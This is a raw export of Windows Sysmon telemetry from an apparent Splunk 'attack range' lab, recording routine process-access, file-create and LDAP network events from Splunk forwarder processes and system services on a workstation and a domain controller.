10:38:45.645{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214529Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.645{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214528Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.645{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0EB5-6216-0404-000000003902}2948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214527Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.645{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0EB5-6216-0404-000000003902}2948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214526Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.646{4F8D34B0-0EB5-6216-0404-000000003902}2948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000214525Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.458{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D398071E1310BD9F38B473619FFFA27,SHA256=C95B7388B0F61210D286A09C5A11C5AAD04512DD6ABFC723FB1E6EEC72452235,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285453Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.580{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53257-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000285452Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:43.580{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53257-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000285451Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:45.151{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9DD3363FAA250B7F7E47380D84165226,SHA256=2039113BBCCF0B186D8B22541C323ACEA6764864D1CD2BC31FF602F51253CB26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285450Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:45.119{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3146845192B7CD95BBD4E8B218461977,SHA256=52DAF8C4032CB55308F1359BB057E9096AD86A45277B4E871EAA6104FA734BA9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285449Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:45.119{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285448Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:45.119{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214524Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.145{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0EB5-6216-0304-000000003902}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214523Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.145{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214522Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.145{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214521Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.145{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214520Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.145{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214519Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.145{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214518Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.145{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214517Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.145{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214516Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.145{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214515Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.145{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214514Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.145{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-0EB5-6216-0304-000000003902}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214513Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.145{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0EB5-6216-0304-000000003902}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214512Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:45.146{4F8D34B0-0EB5-6216-0304-000000003902}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000214543Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:46.614{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA34B3C8A903ADBA3DE56FE443320615,SHA256=9339BE622CE8E34D8073F3719410700D341FD93F65B0C7629FFC89667D734B2C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285456Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:44.424{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53258-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000285455Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:44.424{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53258-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000285454Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:46.166{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=559D78B985E5E01C05588CBF2941C6D5,SHA256=D4BD8ACFE1954D3DE5569FD67417F84B2069FE7FBFA9E686B4DA022420312B8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214542Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:46.192{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F42BABD048B902BAB7104C96EE8DB8F3,SHA256=5D48FAFE0EF7656B17FA2558F3F8FFA0B861C078AA052AFA6D8A40C32CB39925,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214541Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:46.192{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=588968E07A56C1BF64DDBAB54C73601D,SHA256=23C4E1045679026364BD7F216388B0E9E037F2CCFD6FA806D46A6D4CB5EEABAC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214573Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:47.942{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0EB7-6216-0604-000000003902}1424C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214572Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 